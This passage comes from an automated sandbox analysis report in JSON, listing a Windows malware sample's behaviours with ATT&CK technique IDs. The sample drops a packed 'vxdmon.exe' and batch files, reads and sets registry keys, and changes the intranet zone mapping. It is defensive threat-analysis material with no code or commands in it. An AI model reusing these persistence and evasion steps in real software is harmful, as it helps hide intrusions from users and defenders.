C++ 5.0\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" trying to access non-existent file \"C:\\Secur32.dll\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" trying to access non-existent file \"C:\\SSPICLI.DLL\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" trying to access non-existent file \"C:\\api-ms-win-downlevel-advapi32-l2-1-0.dll\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" trying to access non-existent file \"C:\\PROPSYS.dll\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" trying to access non-existent file \"C:\\VERSION.DLL\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" trying to access non-existent file \"C:\\Windows\\System32\\VXDMON.EXE\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" trying to access non-existent file \"C:\\SECUR32.DLL\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" trying to access non-existent file \"C:\\API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"vxdmon.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" reads file \"c:\\82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" reads file \"c:\\vxdmon.exe\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" reads file \"c:\\users\\%osuser%\\desktop\\desktop.ini\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" reads file \"c:\\users\\%osuser%\\searches\\desktop.ini\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" reads file \"c:\\users\\%osuser%\\videos\\desktop.ini\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" reads file \"c:\\users\\%osuser%\\pictures\\desktop.ini\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" reads file \"c:\\users\\%osuser%\\contacts\\desktop.ini\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" reads file \"c:\\users\\%osuser%\\favorites\\desktop.ini\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" reads file \"c:\\users\\%osuser%\\music\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\PARAMETERS\"; Key: \"\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\SETUP MIGRATION\\PROVIDERS\"; Key: \"\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\SETUP MIGRATION\\PROVIDERS\\TCPIP6\"; Key: \"\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\CMF\\CONFIG\"; Key: \"\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\WINDOWS ERROR REPORTING\\WMR\"; Key: \"\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SETUP\"; Key: \"\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\"; Key: \"\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\"; Key: \"\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\\\"; Key: \"\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\\\"; Key: \"\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" trying to touch file \"C:\\version.DLL\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" trying to touch file \"C:\\Secur32.dll\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" trying to touch file \"C:\\Windows\\system32\\Secur32.dll\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" trying to touch file \"C:\\SSPICLI.DLL\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" trying to touch file \"C:\\Windows\\system32\\SSPICLI.DLL\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" trying to touch file \"C:\\api-ms-win-downlevel-advapi32-l2-1-0.dll\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-downlevel-advapi32-l2-1-0.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" trying to access non-existent file \"C:\\82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe.Local\\\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\r2845.bat:Zone.Identifier\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" trying to access non-existent file \"C:\\82844BA2A4FA3776B20F0C6A34A75E7FD39A579FC37E714E5A669483F723A214.EXE.LOCAL\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\r2845.bat:ZONE.IDENTIFIER\"\n \"vxdmon.exe\" trying to access non-existent file \"C:\\vxdmon.exe.Local\\\"\n \"vxdmon.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\r2564.bat:Zone.Identifier\"\n \"vxdmon.exe\" trying to access non-existent file \"C:\\VXDMON.EXE.LOCAL\"\n \"vxdmon.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\r2564.bat:ZONE.IDENTIFIER\"\n \"cmd.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\r2845.bat\"\n \"cmd.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\R2845.BAT\"\n \"cmd.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\r2564.bat\"\n \"cmd.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\R2564.BAT\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" writes file \"c:\\vxdmon.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"vxdmon.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [C:\\vxdmon.exe]- [targetUID: 00000000-00006064]\n \"r2845.bat\" has type \"DOS batch file ASCII text with CRLF line terminators\"- Location: [%TEMP%\\r2845.bat]- [targetUID: 00000000-00006060]\n \"r2564.bat\" has type \"DOS batch file ASCII text with CRLF line terminators\"- Location: [%TEMP%\\r2564.bat]- [targetUID: 00000000-00006064]\n \"VXDMON.EXE.67A9C45E.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"vxdmon.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- Location: [%WINDIR%\\System32\\vxdmon.exe]- [targetUID: 00000000-00006064]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"vxdmon.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"vxdmon.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"\n \"vxdmon.exe\" touched file \"C:\\Windows\\System32\\vxdmon.exe\"\n \"vxdmon.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"vxdmon.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"\n \"vxdmon.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" connecting to \"\\ThemeApiPort\"\n \"vxdmon.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SQMCLIENT\\WINDOWS\"; Key: \"CEIPENABLE\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\PARAMETERS\"; Key: \"TRANSPORTS\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"MAPPING\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\SETUP MIGRATION\\PROVIDERS\\TCPIP6\"; Key: \"WINSOCK 2.0 PROVIDER ID\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"MINSOCKADDRLENGTH\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"MAXSOCKADDRLENGTH\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"USEDELAYEDACCEPTANCE\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"HELPERDLLNAME\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\CMF\\CONFIG\"; Key: \"SYSTEM\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\WINDOWS ERROR REPORTING\\WMR\"; Key: \"DISABLE\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SETUP\"; Key: \"SOURCEPATH\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\"; Key: \"DEVICEPATH\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"DATA\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC3-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"GENERATION\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"DATA\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\MOUNTPOINTS2\\CPC\\VOLUME\\{DCBFAAC4-D863-11E7-B9FF-806E6F6E6963}\"; Key: \"GENERATION\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")\n \"vxdmon.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006060)\n \"82844ba2a4fa3776b20f0c6a34a75e7fd39a579fc37e714e5a669483f723a214.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebe17648d6350000f0fd7f9a5c3d7700e0fd7f18b8120044f0fd7f00000000400000003f0000002100000000f0fd7f0cb81200c15c3d77608244772100000000f0fd7f9a5c3d7700e0fd7f30b8120057893c778083447713175475d8ebe176 (UID: 00000000-00006060)\n \"vxdmon.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8ebe17668942c0000f0fd7f9a5c3d7700e0fd7f18b8120044f0fd7f00000000400000003f0000002100000000f0fd7f0cb81200c15c3d77608244772100000000f0fd7f9a5c3d7700e0fd7f30b8120057893c778083447713175475d8ebe176 (UID: 00000000-00006064)\n \"vxdmon.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100009f185375fe9ecd3000000000e0c2be760080fd7f229fcd307cee12000000000078ff1200bd0655755ad28c45feffffff7cbd537502dfbe76ffffffff000000000000000020df400040f11200000000000000000048f112004cf11200e3084100000000000000000020df400040f11200 (UID: 00000000-00006048)\n \"vxdmon.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006048)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment 